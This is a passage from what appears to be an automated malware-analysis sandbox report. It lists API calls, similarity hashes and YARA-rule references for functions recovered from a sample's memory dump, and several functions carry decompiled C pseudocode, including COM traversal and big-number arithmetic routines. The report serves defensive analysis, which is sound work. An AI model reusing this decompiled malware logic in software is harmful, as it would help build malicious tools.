VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,00B6E54F,?,?,00B81488,00B5235E,00000003), ref: 00B57CCF
VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,00B6E54F,?,?,00B81488,00B5235E,00000003), ref: 00B57CE9
GetLastError.KERNEL32(?,?,00B6E54F,?,?,00B81488,00B5235E,00000003), ref: 00B57CF6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 3a524e0bde7a0f1e6d8c5bf08b522265007782c6b2152718f72663638b90b0b2
Instruction ID: 3586c58a2e7da7eea2f8b0db7f57d2ae33cde65a69f9d37b7db5ff9876b3d5f5
Opcode Fuzzy Hash: 3a524e0bde7a0f1e6d8c5bf08b522265007782c6b2152718f72663638b90b0b2
Instruction Fuzzy Hash: FE01A275200304EFD7209F25DC04E6AB7F9EF84324B108559EA6A93760DB30ED05CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00B55B1E, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00B55B42

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

wsprintfA.USER32 ref: 00B55B73

Part of subcall function 00B5B2BF: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B5ACC7), ref: 00B5B2D5
Part of subcall function 00B5B2BF: wsprintfA.USER32 ref: 00B5B2FD
Part of subcall function 00B5B2BF: lstrlen.KERNEL32(?), ref: 00B5B30C
Part of subcall function 00B5B2BF: wsprintfA.USER32 ref: 00B5B34C
Part of subcall function 00B5B2BF: wsprintfA.USER32 ref: 00B5B381
Part of subcall function 00B5B2BF: memcpy.NTDLL(00000000,?,?), ref: 00B5B38E
Part of subcall function 00B5B2BF: memcpy.NTDLL(00000008,00B7B3F8,00000002,00000000,?,?), ref: 00B5B3A3
Part of subcall function 00B5B2BF: wsprintfA.USER32 ref: 00B5B3C6

HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 00B55BE8

Part of subcall function 00B78D97: RtlEnterCriticalSection.NTDLL(0434C0A0), ref: 00B78DAD
Part of subcall function 00B78D97: RtlLeaveCriticalSection.NTDLL(0434C0A0), ref: 00B78DC8

HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00B55BD2
HeapFree.KERNEL32(00000000,?), ref: 00B55BDE

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
String ID:
API String ID: 3553201432-0
Opcode ID: c0a7f3af7e5256add47c8a4595a318cad958f38b54e62a02262f602af822a7c1
Instruction ID: 6ba34dbbc7ad6a82f23f8e3dc80e2dc415b81225a85229030bb972f70729a3b5
Opcode Fuzzy Hash: c0a7f3af7e5256add47c8a4595a318cad958f38b54e62a02262f602af822a7c1
Instruction Fuzzy Hash: 5E212876800249AFCF11DF99DC48D9F7FB9FF48301B0048AAFA15A7120D7719A65DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B03273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00B032AE
SysFreeString.OLEAUT32(00000000), ref: 00B03393

Part of subcall function 00B05920: SysAllocString.OLEAUT32(00B0C2B0), ref: 00B05970

SafeArrayDestroy.OLEAUT32(00000000), ref: 00B033E6
SysFreeString.OLEAUT32(00000000), ref: 00B033F5

Part of subcall function 00B03D39: Sleep.KERNEL32(000001F4), ref: 00B03D81

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: e934b3dec9c5f9f44a424fff608a4656eccc4b95134eb0fa44b57d5c629370d5
Instruction ID: 3bdb62d6142d2252ddbbd6e1919131b02af4523de3eb915bf79edbf2cfe3cd2b
Opcode Fuzzy Hash: e934b3dec9c5f9f44a424fff608a4656eccc4b95134eb0fa44b57d5c629370d5
Instruction Fuzzy Hash: CE512075500609EFDB01CFA8D888A9EBBF9FF88740B158969E505DB260DB71EE06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B05920, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00B05920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xb0d2e0; // 0xdca5a8
					_t5 = _t103 + 0xb0e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xb0c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xb0d2e0; // 0xdca5a8
												_t28 = _t109 + 0xb0e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xb0d2e0; // 0xdca5a8
														_t33 = _t79 + 0xb0e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00b05925
0x00b0592e
0x00b0592f
0x00b05933
0x00b05939
0x00b0593f
0x00b05948
0x00b0594e
0x00b05958
0x00b0595a
0x00b05960
0x00b05965
0x00b05970
0x00b05976
0x00b0597b
0x00b05a9d
0x00b05981
0x00b05981
0x00b0598e
0x00b05994
0x00b0599a
0x00b0599e
0x00b059a4
0x00b059b1
0x00b059b5
0x00b059bb
0x00b059be
0x00b059c6
0x00b059c7
0x00b059cb
0x00b059cf
0x00b059d2
0x00b059d5
0x00b059db
0x00b059e4
0x00b059ea
0x00b059eb
0x00b059ee
0x00b059ef
0x00b059f0
0x00b059f8
0x00b059f9
0x00b059fa
0x00b059fc
0x00b05a00
0x00b05a04
0x00000000
0x00000000
0x00b05a0a
0x00b05a13
0x00b05a19
0x00b05a23
0x00b05a27
0x00b05a29
0x00b05a36
0x00b05a3a
0x00b05a42
0x00b05a47
0x00b05a59
0x00b05a5b
0x00b05a61
0x00b05a61
0x00b05a6a
0x00b05a6a
0x00b05a6c
0x00b05a72
0x00b05a72
0x00b05a75
0x00b05a7b
0x00b05a7e
0x00b05a87
0x00000000
0x00000000
0x00000000
0x00b05a87
0x00b059db
0x00b059d5
0x00b059be
0x00b05a8d
0x00b05a8d
0x00b05a93
0x00b05a93
0x00b05a99
0x00b05a99
0x00b05aa2
0x00b05aa8
0x00b05aa8
0x00b05965
0x00b05ab1

APIs

SysAllocString.OLEAUT32(00B0C2B0), ref: 00B05970
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00B05A51
SysFreeString.OLEAUT32(00000000), ref: 00B05A6A
SysFreeString.OLEAUT32(?), ref: 00B05A99

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 650dde0e96ba75fc8275fca4d8cf8b6042a35eda819874b95d84bc04ebb29dfa
Instruction ID: b2f1a3ff17068cccad3fd1f3ff3d63d15776afa164ad2d4dd9807ba17c258836
Opcode Fuzzy Hash: 650dde0e96ba75fc8275fca4d8cf8b6042a35eda819874b95d84bc04ebb29dfa
Instruction Fuzzy Hash: 86515175E00519EFCB10DFA8C8889AEBBB5FF88704B148698E915EB250D7319D41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B07B30, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B07B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00B047C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00B0227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00B03C06(_t101,  &_v428, _a8, _t96 - _t81);
					E00B03C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00B0227C(_t101, 0xb0d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00B0227C(_a16, _a4);
						E00B03450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00B0AED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00B0AECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00B02420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00B03F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00B02775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xb0d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00b07b33
0x00b07b3f
0x00b07b45
0x00b07b4a
0x00b07b4e
0x00b07cc0
0x00b07cc4
0x00b07cc4
0x00b07b54
0x00b07b58
0x00b07b5c
0x00b07b5f
0x00b07b6a
0x00b07b70
0x00b07b75
0x00b07b78
0x00b07b92
0x00b07ba1
0x00b07bad
0x00b07bb7
0x00b07bbc
0x00b07bbe
0x00b07bc1
0x00b07c78
0x00b07c7e
0x00b07c8f
0x00b07ca2
0x00b07cb8
0x00000000
0x00b07cbd
0x00b07bca
0x00b07bd1
0x00b07bd5
0x00b07bdb
0x00b07bdd
0x00b07bdf
0x00b07be1
0x00b07be3
0x00b07bed
0x00b07bf2
0x00b07bf4
0x00b07bf6
0x00b07bf7
0x00b07bf8
0x00b07bf9
0x00b07c00
0x00b07c07
0x00b07c0a
0x00b07c0a
0x00b07bd7
0x00b07bd7
0x00b07bd7
0x00b07c12
0x00b07c1a
0x00b07c26
0x00b07c2b
0x00b07c2b
0x00b07c30
0x00000000
0x00000000
0x00b07c32
0x00b07c35
0x00b07c42
0x00000000
0x00000000
0x00b07c44
0x00b07c44
0x00b07c51
0x00b07c2b
0x00b07c30
0x00000000
0x00000000
0x00000000
0x00b07c30
0x00b07c5b
0x00b07c5e
0x00b07c61
0x00b07c68
0x00b07c68
0x00b07c75
0x00000000
0x00b07c75
0x00b07b61
0x00b07b65
0x00b07b66
0x00b07b68
0x00000000
0x00000000
0x00000000
0x00b07b68
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00B07BE3
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00B07BF9
memset.NTDLL ref: 00B07CA2
memset.NTDLL ref: 00B07CB8

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 12f673e0fe85177809c238cfc7da8939a57693887fb714d2c896ef904fc47b56
Instruction ID: 17b679784c58b15d8a357de7ceba0a24ef3bcea51cec37f12a81c1c057e4deb6
Opcode Fuzzy Hash: 12f673e0fe85177809c238cfc7da8939a57693887fb714d2c896ef904fc47b56
Instruction Fuzzy Hash: DE418271A00219AFDB20EF68CC45BDEBBF9EF45710F1045A5F909A72C1EB70AE558B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B55BFD, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00B55CB0
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00B55CC6
memset.NTDLL ref: 00B55D6F
memset.NTDLL ref: 00B55D85

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: a070f9203c116b144fe97e2733c39859e32a9fa8a5b87d453ad243754ba6b1e4
Instruction ID: 1328b9188d36fe88b3aca2eabb8aeb2e546446916d7784098c5c4b1b6a52f284
Opcode Fuzzy Hash: a070f9203c116b144fe97e2733c39859e32a9fa8a5b87d453ad243754ba6b1e4
Instruction Fuzzy Hash: 56419171600219AFDB20EE68CC91BEE77F4EF45312F1045E9FD19A7281DB709E488B90

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C6A8, Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 00B6C6EF
_strupr.NTDLL ref: 00B6C744
_strupr.NTDLL ref: 00B6C783
_strupr.NTDLL ref: 00B6C7BD

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: 8d8f8afb75139b8ea1ca32bd61930adc537c8d8bfef458d4acd6a0354dd5e593
Instruction ID: 77d1370c29046b0cf5624fbbcee440f6210285f5225b11ec2e33c242f41c5b3f
Opcode Fuzzy Hash: 8d8f8afb75139b8ea1ca32bd61930adc537c8d8bfef458d4acd6a0354dd5e593
Instruction Fuzzy Hash: 8C413B728012099EDB21AFA4D889AFEBBE8FF14354F114465F829D6021D778E949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AC28, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7082C: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B68655), ref: 00B70838
Part of subcall function 00B7082C: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00B70896
Part of subcall function 00B7082C: lstrcpy.KERNEL32(00000000,00000000), ref: 00B708A6

lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 00B5AC77
wsprintfA.USER32 ref: 00B5ACA7
GetLastError.KERNEL32 ref: 00B5AD1C

Strings

`, xrefs: 00B5ACD8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: `
API String ID: 324226357-1850852036
Opcode ID: a7e9e66b6b571f22b944cd52713400215304c0cb2d0df44dbec7ad458ca82c7d
Instruction ID: d6ce08e971dc09b915aaadcc15cb7c18562e13a1ab789f5c9dc3c9d6e034b3f9
Opcode Fuzzy Hash: a7e9e66b6b571f22b944cd52713400215304c0cb2d0df44dbec7ad458ca82c7d
Instruction Fuzzy Hash: 31319E31100209ABCB11EF54DC85FAA7BF9EF54352F0045AAFD15AA161EB30E919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B57979, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B57A99

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

GetLastError.KERNEL32 ref: 00B57A0D
WaitForSingleObject.KERNEL32(00000000), ref: 00B57A1D
GetLastError.KERNEL32 ref: 00B57A3D

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 78ab40c74bc803c0206af96e89d9687d0dd4b4b04ebf8054d5c39fa98fbc5231
Instruction ID: b285a00453d212502b528cacd6f9a8b0d22f45dcf4f4a4b097ffd845318e0cdd
Opcode Fuzzy Hash: 78ab40c74bc803c0206af96e89d9687d0dd4b4b04ebf8054d5c39fa98fbc5231
Instruction Fuzzy Hash: 6F41CC71E44209EFDF10DFA5D984AAEB7F9EB04342B1044E9E905E7150DB709F49DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F2D4, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6A743: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 00B6A751

RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6F33C
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B6F38D

Part of subcall function 00B6AA30: CreateFileW.KERNEL32(00000000,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B6AA70
Part of subcall function 00B6AA30: GetLastError.KERNEL32 ref: 00B6AA7A
Part of subcall function 00B6AA30: WaitForSingleObject.KERNEL32(000000C8), ref: 00B6AA9F
Part of subcall function 00B6AA30: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B6AAC2
Part of subcall function 00B6AA30: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 00B6AAEA
Part of subcall function 00B6AA30: WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 00B6AAFF
Part of subcall function 00B6AA30: SetEndOfFile.KERNEL32(00000001), ref: 00B6AB0C
Part of subcall function 00B6AA30: CloseHandle.KERNEL32(00000001), ref: 00B6AB24

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,00B5CBAA,?,?,?,?,?,?), ref: 00B6F3C2
HeapFree.KERNEL32(00000000,?,?,?,?,00B5CBAA,?,?,?,?,?,?,00000000,?,00000000), ref: 00B6F3D2

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 4200334623-0
Opcode ID: 4094c6f04f4522f05368d1086d0fb06718cdf0be954e8165fca0220ead992355
Instruction ID: 08792b6db70313faaa000534b172a8d7d7db5d2636fea4bb4ccd774b243fcede
Opcode Fuzzy Hash: 4094c6f04f4522f05368d1086d0fb06718cdf0be954e8165fca0220ead992355
Instruction Fuzzy Hash: 4A311876500119BFDB00DFA4DC88DAEBBBEEF09350B1044A5F605E3220DB71AE95DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B56B3A, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 00B56B69
SetEvent.KERNEL32(?), ref: 00B56BB3
TlsSetValue.KERNEL32(00000001), ref: 00B56BED
TlsSetValue.KERNEL32(00000000), ref: 00B56C09

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 93411e8cdda8d32abf3c2c402f9505bb03506cfabb981b516ab13e788ac48aa7
Instruction ID: 7d2c4ed483e576d9163db8e0e1db4d2d08d5fcf7c999e4d9f800479d3571407d
Opcode Fuzzy Hash: 93411e8cdda8d32abf3c2c402f9505bb03506cfabb981b516ab13e788ac48aa7
Instruction Fuzzy Hash: 7E21B131100208AFDB229F58DD8AF9A7BF6FB40721B9008A5FA52DB570CB31AC55DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6290F, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B6293E
lstrlen.KERNEL32(00000000), ref: 00B6294F

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

strcpy.NTDLL ref: 00B62966
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00B62970

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 8a649a8091618f84dd82d7d6d63c674910c47fcaa557f7a524d138a790de8790
Instruction ID: 99cd1ee123bccd1ac8731e41a564e2822ee6f3a3135e4ab2f4e70a142b2ee6b6
Opcode Fuzzy Hash: 8a649a8091618f84dd82d7d6d63c674910c47fcaa557f7a524d138a790de8790
Instruction Fuzzy Hash: 9A21F572510B01AFE7206B64DC49B2B77E8EF84352F048869FD56872E1DF79D804CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00B022D2, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00B022D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00B075F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00b022de
0x00b022e2
0x00b022e3
0x00b022e4
0x00b022e6
0x00b022e8
0x00b022eb
0x00b022f0
0x00b02387
0x00b0238e
0x00b0238e
0x00b022f9
0x00b02300
0x00b02310
0x00b02310
0x00b02316
0x00b02318
0x00b0231d
0x00b02326
0x00b0232c
0x00b02331
0x00b0233c
0x00b02340
0x00b02342
0x00b02343
0x00b0234c
0x00b02350
0x00b02361
0x00b02352
0x00b02357
0x00b0235c
0x00b0236b
0x00b0236b
0x00b02340
0x00b02371
0x00b02377
0x00b02377
0x00b02380
0x00b02385
0x00b02385
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00B02300
lstrlenW.KERNEL32(?), ref: 00B02336
memcpy.NTDLL(00000000,?,?,?), ref: 00B02357
SysFreeString.OLEAUT32(?), ref: 00B0236B

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 3811d0012c88f0e8ddf624b67be4bc0ec2690705821d933610056dae84b77002
Instruction ID: c18b3634a7ffc110f136c48cae8f80d824297480f156c9bf085416d12e59d103
Opcode Fuzzy Hash: 3811d0012c88f0e8ddf624b67be4bc0ec2690705821d933610056dae84b77002
Instruction Fuzzy Hash: 4A214F7990020AEFCB11DFA8C98899EBFF9FF49300B1081A9E945E7250EB34DA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B78D97, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0434C0A0), ref: 00B78DAD
RtlLeaveCriticalSection.NTDLL(0434C0A0), ref: 00B78DC8
GetLastError.KERNEL32 ref: 00B78E36
GetLastError.KERNEL32 ref: 00B78E45

